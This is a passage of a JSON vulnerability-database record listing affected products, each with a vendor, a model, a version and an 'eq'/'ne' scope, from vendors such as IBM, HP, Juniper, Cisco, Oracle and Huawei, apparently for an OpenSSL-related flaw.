"1.3.21-21" }, { "model": "junos pulse for android", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.1.22" }, { "model": "system x3550m3 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "79441.42" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.9" }, { "model": "storevirtual 1tb mdl china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.5" }, { "model": "proactive network operations center", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "algo audit and compliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.0.2" }, { "model": "project openssl 0.9.8f", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "websphere cast iron cloud integration", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.40" }, { "model": "airwave", "scope": "eq", "trust": 0.3, "vendor": "arubanetworks", "version": "7.2.2" }, { "model": "vfabric application director", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.2" }, { "model": "color laserjet printer series q5981a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "380046.80.8" }, { "model": "enterprise virtualization", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "3" }, { "model": "junos 11.2r2", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "malware analysis appliance", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "4.1" }, { "model": "ip video phone e20", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "junos space", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "1.2.2" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.2" }, { "model": "blackberry enterprise service", "scope": "eq", "trust": 0.3, "vendor": "rim", "version": "10.1.2.6" }, { "model": "junos 10.2r2", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "storevirtual 900gb china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433011.5" }, { "model": "proxysg sgos", "scope": "ne", "trust": 0.3, "vendor": "bluecoat", "version": "6.5.4.4" }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "7.5" }, { "model": "project openssl beta3", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.1" }, { "model": "mate products", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "6.2" }, { "model": "websphere datapower xml accelerator xa35", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.0.8" }, { "model": "project openssl 1.0.1a", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "laserjet pro m401a/d/dn/dnw/dw/n cz195a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "40020150212" }, { "model": "integrity sd2 cb900s i2 and i4 server", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "3.7.98" }, { "model": "websphere datapower xml security gateway xs40", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.010" }, { "model": "flex system p260", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "one-x communicator for microsoft windows", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.4" }, { "model": "storevirtual 4tb mdl sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.5" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "3.1.9" }, { "model": "firepass", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "7.0" }, { "model": "integrated management module ii", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.37" }, { "model": "pulse desktop 4.0r11.1", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "srg1200\u00262200\u00263200 v100r002c02hp0001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "laserjet p4015 cb510a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.2" }, { "model": "sylpheed", "scope": "eq", "trust": 0.3, "vendor": "sylpheed", "version": "1.0.2" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6" }, { "model": "security network intrusion prevention system gx3002", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.1.8" }, { "model": "sterling connect:enterprise for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.4" }, { "model": "meeting exchange sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "ive os 7.4r6", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos 13.3r3", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "56000" }, { "model": "puredata system for hadoop", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.00" }, { "model": "utm manager", "scope": "eq", "trust": 0.3, "vendor": "sophos", "version": "4.1" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.1.29" }, { "model": "laserjet printer series q7699a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "9040/90508.260.3" }, { "model": "messaging secure gateway", "scope": "eq", "trust": 0.3, "vendor": "f secure", "version": "7.5" }, { "model": "junos 12.1x44-d35", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "xenclient enterprise", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "4.5.5" }, { "model": "jabber guest", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.2.23" }, { "model": "m220 family", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "websphere datapower xml security gateway xs40", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.03" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "77009.7" }, { "model": "8.4-release-p9", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "web security appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "xenclient enterprise", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "5.0.2" }, { "model": "s2750\u0026s5700\u0026s6700 v200r002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "unified agent", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "4.1" }, { "model": "switch series", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "58300" }, { "model": "jetdirect 695n eio card j8024a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "41.16" }, { "model": "data ontap", "scope": "eq", "trust": 0.3, "vendor": "netapp", "version": "7.3.2" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.3" }, { "model": "laserjet printer series q5410a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "43508.250.2" }, { "model": "espace u19** v100r001c10", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "data recovery", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "2.0.3" }, { "model": "content security management appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.3.1" }, { "model": "uma v200r001c00spc100", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "communications policy management", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "9.9.1" }, { "model": "junos space", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "1.0" }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x350073830" }, { "model": "storevirtual 450gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.6" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.3" }, { "model": "image construction and composition tool", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3.1.0" }, { "model": "idatplex dx360 m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "79120" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.0.21" }, { "model": "cms r16", "scope": null, "trust": 0.3, "vendor": "avaya", "version": null }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.4" }, { "model": "telepresence content server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "color laserjet m651 cz256a 2302963 436073", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": null }, { "model": "oceanstor s6800t v100r005", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "aura system platform sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "project openssl 0.9.8w", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "junos 12.1x47-d10", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "fortisandbox", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "0" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "3.2.12" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.121" }, { "model": "digital media players series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "44000" }, { "model": "vdi communicator", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "1.0.1" }, { "model": "color laserjet printer series q7494a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "470046.230.6" }, { "model": "switch series", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "119000" }, { "model": "secure analytics 2014.2r3", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "storevirtual 600gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473012.5" }, { "model": "power ps704 blade", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "(7891-74x)0" }, { "model": "storevirtual 450gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.120" }, { "model": "flashsystem 9843-ae1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "840" }, { "model": "laserjet enterprise mfp m725 cf067a 2302963 436078", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": null }, { "model": "laserjet enterprise p3015 ce525a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7.186.1" }, { "model": "nsx for vsphere", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "6.0.4" }, { "model": "junos 13.1r3-s1", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.1.24" }, { "model": "project openssl 1.0.1g", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "big-ip edge clients for linux", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "7101" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.4" }, { "model": "netscaler build", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "8.157.3" }, { "model": "laserjet cm3530 multifunction printer cc519a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "48.306.1" }, { "model": "laserjet enterprise m4555 mfp ce738a 2302963 436064", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": null }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.48" }, { "model": "horizon workspace", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "1.5" }, { "model": "storevirtual 600gb china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "413012.6" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.9" }, { "model": "ips", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "espace usm v100r001 v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "idp series", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "laserjet enterprise p3015 ce527a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7.186.1" }, { "model": "laserjet enterprise p3015 ce526a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7.186.1" }, { "model": "junos space", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "13.1" }, { "model": "storevirtual 1tb mdl sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433011.5" }, { "model": "oncommand unified manager core package", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5" }, { "model": "tivoli netcool/system service monitor fp12", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "watson explorer", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.0.0.4" }, { "model": "laserjet enterprise mfp m630 series b3g86a 2303714 233000041", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": null }, { "model": "system storage ts3400 tape library", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "0042" }, { "model": "email security gateway anywhere", "scope": "eq", "trust": 0.3, "vendor": "websense", "version": "7.8.1" }, { "model": "junos 12.3r2", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "storevirtual 900gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473012.5" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.2.143" }, { "model": "nexus switch", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "31640" }, { "model": "laserjet m3035 multifunction printer cb415a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "laserjet cm3530 multifunction printer cc520a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "messagesight server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0" }, { "model": "ive os 8.0r4.1", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos 11.4r7", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "fusionsphere v100r003c10spc600", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "msr93x family", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.47" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.2" }, { "model": "color laserjet multifunction printer series q7520a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "400046.380.3" }, { "model": "telepresence advanced media gateway series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "airwave", "scope": "ne", "trust": 0.3, "vendor": "arubanetworks", "version": "7.7.12" }, { "model": "security analytics platform", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "6.0" }, { "model": "flashsystem 9846-ae1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "840" }, { "model": "tivoli workload scheduler distributed fp03", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6.0" }, { "model": "smc2.0 v100r002c01b025sp07", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "s2700\u0026s3700 v100r006", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "project openssl 0.9.8r", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "espace cc v200r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "9250c digital sender cb472a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "48.293.1" }, { "model": "protection service for email", "scope": "eq", "trust": 0.3, "vendor": "f secure", "version": "7.1" }, { "model": "websphere cast iron cloud integration", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.31" }, { "model": "laserjet enterprise color mfp m880 d7p71a 2302963 436068", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "800" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "4.0.8" }, { "model": "netezza diagnostic tools", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.0" }, { "model": "laserjet m4345 multifunction printer cb427a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.21" }, { "model": "netscaler", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "8.1.68.7" }, { "model": "elan", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "8.2" }, { "model": "isoc v200r001c01", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "5000" }, { "model": "malware analyzer g2", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "3.5" }, { "model": "ds8870", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3" }, { "model": "laserjet enterprise color m855 a2w77a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "8000" }, { "model": "storevirtual 600gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473011.5" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.81" }, { "model": "websphere datapower soa appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.2.15" }, { "model": "linerate", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "2.2.2" }, { "model": "dgs-1500-28", "scope": "eq", "trust": 0.3, "vendor": "d link", "version": "2.51.005" }, { "model": "3par service processor sp-4.2.0.ga-29.p003", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": null }, { "model": "junos 12.1x44-d40", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "s7-1500", "scope": "ne", "trust": 0.3, "vendor": "siemens", "version": "1.6" }, { "model": "project openssl beta4", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.0" }, { "model": "esight-ewl v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "hyperdp oceanstor n8500 v200r001c91", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "guardium database activity monitor", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "virtual tape library", "scope": "eq", "trust": 0.3, "vendor": "netapp", "version": "0" }, { "model": "integrated management module ii", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.70" }, { "model": "storevirtual hybrid san solution", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433512.0" }, { "model": "meeting exchange", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.11" }, { "model": "cloud service automation", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "4.01" }, { "model": "project openssl 1.0.0l", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "general parallel file system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.5.0" }, { "model": "color laserjet multifunction printer series q7518a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "400046.380.3" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.13" }, { "model": "simatic wincc oa", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "3.8" }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "laserjet printer series q7544a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "52008.241" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "laserjet enterprise m4555 mfp ce502a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "oic v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "junos space 13.1p1.14", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "dgs-1210-20", "scope": "eq", "trust": 0.3, "vendor": "d link", "version": "4.00.041" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.2" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.3" }, { "model": "icewall sso dfw certd", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "10.0" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0" }, { "model": "spa300 series ip phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "laserjet enterprise m603 series ce996a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6000" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.9" }, { "model": "cit", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5.2" }, { "model": "color laserjet cp6015 q3932a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "content analysis system software", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "1.1.53" }, { "model": "horizon workspace client for mac", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "1.5" }, { "model": "communicator for microsoft windows", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "2.0" }, { "model": "via for linux", "scope": "eq", "trust": 0.3, "vendor": "arubanetworks", "version": "2.0.0" }, { "model": "upward integration modules for microsoft system center", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.5" }, { "model": "color laserjet printer series q5983a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "380046.80.8" }, { "model": "junos 11.4r9-s1", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "project openssl 0.9.8p", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "rc2", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "9.2" }, { "model": "telepresence isdn link", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "sbr enterprise", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "6.10" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.23" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.0.6" }, { "model": "big-ip aam", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "puremessage for unix", "scope": "eq", "trust": 0.3, "vendor": "sophos", "version": "4.05" }, { "model": "splunk", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "5.0.1" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.9.4" }, { "model": "storevirtual fc 900gb china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.6" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.19" }, { "model": "tivoli storage productivity center fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.14" }, { "model": "sterling connect:enterprise for unix ifix03", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.5.0.3" }, { "model": "power express", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7300" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "officejet enterprise color mfp b5l04a 2302963 436066", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "x585" }, { "model": "sterling connect:direct for microsoft windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5.01" }, { "model": "snapdrive for windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.2" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.5" }, { "model": "via for linux", "scope": "ne", "trust": 0.3, "vendor": "arubanetworks", "version": "2.0.2" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.17" }, { "model": "pulse desktop 5.0r3.1", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.06" }, { "model": "netscaler", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "9.3.61.5" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.115" }, { "model": "secure access control server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "xenclient enterprise", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "5.1.2" }, { "model": "junos 5.0r3", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.9.1" }, { "model": "fortios build", "scope": "ne", "trust": 0.3, "vendor": "fortinet", "version": "5.2.0589" }, { "model": "virtualization experience media engine", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "jetdirect 620n eio card j7934g", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "29.26" }, { "model": "junos 10.0s18", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "scanjet enterprise document capture workstation l2719a 2302963 436065", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "8500" }, { "model": "xenclient enterprise", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "5.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.33" }, { "model": "jabber im for android", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.2" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.12" }, { "model": "small cell factory recovery root filesystem", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "2.99.4" }, { "model": "proxysgos", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "6.4" }, { "model": "netezza platform software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.45" }, { "model": "cognos tm1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.0.2" }, { "model": "service manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.31" }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "flex system enterprise chassis", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8724" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.78" }, { "model": "ftp server", "scope": "eq", "trust": 0.3, "vendor": "cerberus", "version": "7.0" }, { "model": "sylpheed", "scope": "eq", "trust": 0.3, "vendor": "sylpheed", "version": "1.9.2" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "secure global desktop", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0" }, { "model": "color laserjet flow m680 ca251a 2302963 436072", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": null }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x365079150" }, { "model": "exalogic", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "x3-22.0.6.2.0" }, { "model": "opensuse", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "11.4" }, { "model": "storevirtual china hybrid storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433512.0" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3.6" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.1.10" }, { "model": "espace vtm v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "spa122 ata with router", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "junos 10.4r", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.15" }, { "model": "web security gateway", "scope": "eq", "trust": 0.3, "vendor": "websense", "version": "7.8.3" }, { "model": "config manager", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.6" }, { "model": "splunk", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "6.0.3" }, { "model": "storevirtual fc 900gb sas storage", "scope": "eq", "trust": 0.3, 